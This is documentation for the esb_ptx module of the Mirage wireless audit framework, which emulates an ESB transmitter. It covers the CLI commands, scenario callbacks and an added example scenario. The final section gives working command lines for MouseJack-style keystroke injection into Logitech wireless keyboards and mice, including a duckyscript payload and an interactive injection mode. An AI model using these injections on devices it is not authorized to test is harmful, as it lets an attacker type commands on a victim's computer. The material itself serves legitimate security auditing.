esb_ptx

Presentation

esb_ptx simulates the behaviour of a PTX (Primary Transmitter) device. It is a core module of the framework, making it possible to quickly build recurring behaviours during a security audit. If a scenario is provided, the module is launched in “scenario” mode, with events delivered as callbacks on specific packet types, which allows complex interactions to be implemented. Otherwise, it is launched in “interpreter” mode and opens a CLI for the user.

A follow mode, controlled by the FOLLOW_MODE parameter, regularly checks whether the corresponding PRX (Primary Receiver) is still responding on the current channel. The module sends a ping request every second; if no acknowledgement frame is received, it automatically scans the channels in order to find the PRX again.

Compatible devices

Input parameters

Name          Default value   Possible values   Description
-----------   -------------   ---------------   ----------------
INTERFACE     rfstorm0        rfstormX          Interface to use
TARGET                        <ESB address>     Target address
FOLLOW_MODE   yes             yes|no            Follow mode
SCENARIO                      <scenario>        Scenario to use

Scenario signals

The behaviour of this module can be modified using scenarios. If you need more details about Mirage scenarios, their usage is described here. The following signals are generated by this module if a scenario is provided using the SCENARIO input parameter:

Signal             Parameters   Activation                                                                 Default behaviour
----------------   ----------   -------------------------------------------------------------------------   -------------------
onStart                         when the module starts its execution                                        nothing is executed
onEnd                           when the module stops its execution                                         nothing is executed
onKey              key          when a key is pressed                                                       nothing is executed
onESBAckResponse   packet       when an incoming acknowledgement is received (from the PRX)                 nothing is executed
onPingFailure                   when the ping acknowledgement is not received (from the PRX)                nothing is executed
onPRXFound                      when the PRX has been found by the scan initiated after the ping failure    nothing is executed

You can manually stop the module’s execution by calling the method stopScenario:

self.module.stopScenario()
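As an added example (not part of the Mirage documentation or code base), the scenario below uses the signals listed above to watch the link to the PRX and stop the module cleanly once the PRX has stayed silent for several ping rounds. It assumes that scenarios subclass mirage.core.scenario.Scenario, that the callbacks take the parameters given in the table, that handlers return True to keep the module's default behaviour, and that self.module is the running esb_ptx module; the failure threshold and the fallback base class are constructed for this example.

```python
# Added example scenario for esb_ptx (not shipped with Mirage).
# Assumption: Mirage scenarios subclass mirage.core.scenario.Scenario.
try:
    from mirage.core import scenario
    ScenarioBase = scenario.Scenario
except ImportError:            # fallback so the callbacks can run outside Mirage
    class ScenarioBase:
        def __init__(self, module=None):
            self.module = module   # stand-in for the esb_ptx module object

MAX_CONSECUTIVE_FAILURES = 3   # constructed threshold for this example


class esb_ptx_linkwatch(ScenarioBase):
    def onStart(self):
        self.acks = 0            # acknowledgements received from the PRX
        self.failures = 0        # consecutive ping failures since the last ack
        self.rediscoveries = 0   # times the post-failure scan found the PRX again
        return True              # assumption: True keeps the default behaviour

    def onESBAckResponse(self, packet):
        # Any acknowledgement proves the PRX is alive: reset the failure streak.
        self.acks += 1
        self.failures = 0
        return True

    def onPingFailure(self):
        # Called each time a follow-mode ping goes unanswered.
        self.failures += 1
        if self.failures >= MAX_CONSECUTIVE_FAILURES:
            # The PRX has been silent for several rounds: end the scenario
            # instead of letting the module keep scanning indefinitely.
            self.module.stopScenario()
        return True

    def onPRXFound(self):
        # The automatic scan located the PRX on another channel.
        self.rediscoveries += 1
        self.failures = 0
        return True

    def onKey(self, key):
        if key == "q":           # let the operator end the scenario by hand
            self.module.stopScenario()
        return True

    def onEnd(self):
        return True
```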

Commands

The following commands are available in the CLI interface:

  • clear: clears the screen

  • channel: displays the current channel

  • channel <channel>: moves to the provided channel

  • scan: calls the esb_scan module to list nearby ESB devices

  • scan <duration>: calls the esb_scan module for the specified duration to list nearby ESB devices

  • scan <duration> <start_channel> <end_channel>: calls the esb_scan module for the specified duration on the specified channel range to list nearby ESB devices

  • address: displays the currently selected address

  • address <ESB address>: changes the address to the one provided

  • find_prx: performs an active scan in order to find the corresponding PRX

  • find_prx <channel_range>: performs an active scan in order to find the corresponding PRX in the selected channel range (e.g. “0-10”)

  • follow_prx: enables the follow mode

  • unfollow_prx: disables the follow mode

  • send <payload>: sends a specific payload to the PRX

  • send <payload1>,<payload2>,…: sends multiple payloads to the PRX

  • exit: ends the execution

Usage

CLI mode

If you want to use this module in CLI mode, just call the module without input parameters:

$ mirage esb_ptx
[INFO] Module esb_ptx loaded !
[PTX|12]:

You can easily scan for devices using the scan command:

[PTX|99]: scan
┌────────────────┬──────────┬──────────┐
│ Address        │ Channels │ Protocol │
├────────────────┼──────────┼──────────┤
│ E8:46:F9:2F:A4 │ 8        │ logitech │
└────────────────┴──────────┴──────────┘
())))))))))))))))))))))))))))))))))))))))))))))))))___________) Channel: 81

Then, you can select a specific address using the address command:

[PTX|98]: address E8:46:F9:2F:A4
[PTX|98|E8:46:F9:2F:A4]:

You can automatically find the PRX using the find_prx command:

[PTX|98|E8:46:F9:2F:A4]: find_prx
[SUCCESS] ACK received from PRX on channel #8
[PTX| 8|E8:46:F9:2F:A4]:

Alternatively, you can set the channel manually using the channel command:

[PTX| 8|E8:46:F9:2F:A4]: channel 23
[PTX|23|E8:46:F9:2F:A4]:

You can enable the follow mode using the follow_prx command:

[PTX|23|E8:46:F9:2F:A4]: follow_prx
[PTX| 8|E8:46:F9:2F:A4]:

and disable it using unfollow_prx:

[PTX| 8|E8:46:F9:2F:A4]: unfollow_prx
[PTX| 8|E8:46:F9:2F:A4]:

Finally, you can transmit payloads using the send command:

[PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f
[SUCCESS] ACK received.
[PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f,1122,3344
[SUCCESS] ACK received.
[SUCCESS] ACK received.
[SUCCESS] ACK received.

Customizing the behaviour using scenarios

If you want to use a scenario, you can use the create_scenario command to generate a basic scenario skeleton:

$ mirage --create_scenario
[QUESTION] Scenario's name : esb_ptx_test
[SUCCESS] Scenario master_test successfully generated : /home/user/.mirage/scenarios/esb_ptx_test.py
[INFO] Mirage process terminated !

Then, you can modify the code as needed.

To use this scenario, just provide its name as the value of the SCENARIO input parameter:

$ sudo mirage esb_ptx SCENARIO=esb_ptx_test
[INFO] Module esb_ptx loaded !
[INFO] Scenario loaded !
[...]
[INFO] Mirage process terminated !

Performing keystrokes injection attacks

Two main scenarios are provided, allowing the unencrypted and encrypted keystroke injection attacks targeting Logitech mice and keyboards described in the MouseJack whitepaper to be performed easily:

  • logitech_unencrypted_keystrokes_injection: this scenario injects unencrypted keystrokes to a wireless mouse address, bypassing the encryption.

  • logitech_encrypted_keystrokes_injection: this scenario injects forged encrypted keystrokes by exploiting a weakness in the AES implementation of Logitech Unifying.

These scenarios are used by providing them as the scenario of the module. They can be used in three modes:

If you want to inject a simple text, provide a new parameter named TEXT to the module:

$ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection TEXT=bonjour
[INFO] Module esb_ptx loaded !
[INFO] Enabling following mode ...
[INFO] Scenario loaded !
[INFO] Following mode disabled by the scenario.
[INFO] Generating attack stream ...
[INFO] Text injection: bonjour
[INFO] Looking for target E8:46:F9:2F:A4...
[SUCCESS] Target found !
[INFO] Injecting ...
bonjour

If you want to perform a more complex keystroke injection, you can provide a duckyscript file:

$ cat > /tmp/duck.ducky
DELAY 1000
ALT F2
DELAY 1000
STRING firefox https://homepages.laas.fr/rcayre/mirage-documentation
DELAY 1000
ENTER
$ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection DUCKYSCRIPT=/tmp/duck.ducky
[INFO] Module esb_ptx loaded !
[INFO] Enabling following mode ...
[INFO] Scenario loaded !
[INFO] Following mode disabled by the scenario.
[INFO] Generating attack stream ...
[INFO] Duckyscript injection: /tmp/duck.ducky
[INFO] Looking for target E8:46:F9:2F:A4...
[SUCCESS] Target found !
[INFO] Injecting ...
[INFO] Terminating scenario ...
[INFO] Mirage process terminated !

Finally, you can also use the interactive mode in order to directly interact with the target computer:

$ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection INTERACTIVE=yes
[INFO] Module esb_ptx loaded !
[INFO] Enabling following mode ...
[INFO] Scenario loaded !
[INFO] Following mode disabled by the scenario.
[INFO] Generating attack stream ...
[INFO] Interactive mode
[INFO] Looking for target E8:46:F9:2F:A4...
[SUCCESS] Target found !
[INFO] Injecting ...
[INFO] Injecting:b
[INFO] Injecting:o
[INFO] Injecting:n
[INFO] Injecting:j
[INFO] Injecting:o
[INFO] Injecting:u
[INFO] Injecting:r
[...]